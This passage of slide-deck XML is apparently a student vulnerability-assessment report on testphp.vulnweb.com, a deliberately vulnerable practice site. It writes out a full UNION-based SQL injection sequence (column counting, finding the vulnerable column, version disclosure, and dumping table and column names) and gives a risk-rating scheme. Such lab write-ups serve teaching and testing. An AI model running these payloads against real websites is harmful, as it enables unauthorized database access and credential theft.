                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>We performed some blackbox vulnerability tests on the web address using automatic scanner as well as manually.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Blackbox testing aims at:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Examining a system against external factors responsible for any  weakness that could be used by an external attacker to disrupt the network’s security.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3F3F3F"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Quattrocento Sans"/>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0"/>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rPr lang="en-US"/>
              <a:t>OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="355" name="Google Shape;355;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="921801" y="1588162"/>
            <a:ext cx="8464731" cy="428185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1"/>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rPr lang="en-US"/>
              <a:t>INPUT AND RESULT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896982" y="1393371"/>
            <a:ext cx="9945189" cy="166199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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Using the query:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/product.php?pic=1 order by 11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2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362" name="Google Shape;362;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896982" y="4328160"/>
            <a:ext cx="9056914"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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Result: We get the possible columns in the website. Here we have 11 columns.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2"/>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rPr lang="en-US"/>
              <a:t>OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="368" name="Google Shape;368;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="826007" y="1689462"/>
            <a:ext cx="8422497" cy="420679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3"/>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rPr lang="en-US"/>
              <a:t>INPUT AND RESULT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644435" y="1243959"/>
            <a:ext cx="9997440" cy="209288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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Use the query:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Quattrocento Sans"/>
              <a:ea typeface="Quattrocento Sans"/>
              <a:cs typeface="Quattrocento Sans"/>
              <a:sym typeface="Quattrocento Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/product.php?pic=-1 union select all 1,2,3,4,5,6,7,8,9,10,11-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="16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375" name="Google Shape;375;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783771" y="4084320"/>
            <a:ext cx="10223863"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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Result: We get to know which column is vulnerable among all. Here 7</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> column is vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a: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4"/>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rPr lang="en-US"/>
              <a:t>OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="381" name="Google Shape;381;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496567" y="1342631"/>
            <a:ext cx="9570721" cy="417273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5"/>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rPr lang="en-US"/>
              <a:t>INPUT AND RESULT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949234" y="1402080"/>
            <a:ext cx="10476412"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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Use the query:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>4. http://testphp.vulnweb.com/product.php?pic=-1 union select all 1,2,3,4,5,6,@@version,8,9,10,11</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Quattrocento Sans"/>
              <a:ea typeface="Quattrocento Sans"/>
              <a:cs typeface="Quattrocento Sans"/>
              <a:sym typeface="Quattrocento Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Google Shape;388;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-17621"/>
            <a:ext cx="184731" cy="492443"/>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800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="0" i="0" lang="en-US" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;p45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-94565"/>
            <a:ext cx="184731" cy="646331"/>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mo"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="0" i="0" lang="en-US" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="0" i="0" lang="en-US" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Google Shape;390;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="949234" y="3809316"/>
            <a:ext cx="103632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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Result: We get to know all the version details of the SQL server.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6"/>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rPr lang="en-US"/>
              <a:t>OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="396" name="Google Shape;396;p46"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="679268" y="1550126"/>
            <a:ext cx="10580915" cy="446749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7"/>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rPr lang="en-US"/>
              <a:t>INPUT AND RESULT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Google Shape;402;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635726" y="1168053"/>
            <a:ext cx="10911840" cy="252376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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Use the query:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Quattrocento Sans"/>
              <a:ea typeface="Quattrocento Sans"/>
              <a:cs typeface="Quattrocento Sans"/>
              <a:sym typeface="Quattrocento Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/product.php?pic=-1 union select all 1,2,3,4,5,6,group_concat(table_name),8,9,10,11 from information_schema.tables where table_schema=database()--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2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403" name="Google Shape;403;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635726" y="4388593"/>
            <a:ext cx="9927771"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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Result: We get the tables from the database of the website.</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8"/>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rPr lang="en-US"/>
              <a:t>OUTPUT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="409" name="Google Shape;409;p48"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="374469" y="1924595"/>
            <a:ext cx="11277600" cy="439138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9"/>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rPr lang="en-US"/>
              <a:t>INPUT AND RESULT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Google Shape;415;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1358537"/>
            <a:ext cx="11338560" cy="252376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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Use the query:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Quattrocento Sans"/>
              <a:ea typeface="Quattrocento Sans"/>
              <a:cs typeface="Quattrocento Sans"/>
              <a:sym typeface="Quattrocento Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arimo"/>
                <a:ea typeface="Arimo"/>
                <a:cs typeface="Arimo"/>
                <a:sym typeface="Arimo"/>
              </a:rPr>
              <a:t>http://testphp.vulnweb.com/product.php?pic=-1 union select all 1,2,3,4,5,6,group_concat(column_name),8,9,10,11 from information_schema.columns where table_schema=database()--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2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416" name="Google Shape;416;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="4450607"/>
            <a:ext cx="10755086"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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Result: we get the columns which contain sensitive information like username and password.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5"/>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rPr lang="en-US"/>
              <a:t>RISK DEFINATION</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883920" y="1371600"/>
            <a:ext cx="2042160" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF00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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>HIGH</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Google Shape;86;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997200" y="1367028"/>
            <a:ext cx="8310880" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="323F4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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Weakness in control that represent exposure to the organization or risks that could compromise the control framework, data integrity and / or operational efficiency. These risks need to be addressed with utmost priority.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2988886" y="2648206"/>
            <a:ext cx="8310880" cy="1209041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="8296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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Potential weakness in control, which would develop into an exposure. Or issues that represent areas of concerns and may impact controls. They should be addressed reasonably promptly.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Quattrocento Sans"/>
              <a:ea typeface="Quattrocento Sans"/>
              <a:cs typeface="Quattrocento Sans"/>
              <a:sym typeface="Quattrocento Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883920" y="2648206"/>
            <a:ext cx="2042160" cy="1209041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="BA8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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>MEDIUM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997200" y="3923794"/>
            <a:ext cx="8310880" cy="1266948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BFBFBF"/>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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>Potential weakness in controls, which in combination with other weaknesses can develop into exposure. Suggested improvements not immediately/ directly affecting controls.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="883920" y="3927865"/>
            <a:ext cx="2042160" cy="1266948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12700">
            <a:solidFill>
              <a:srgbClr val="517E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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
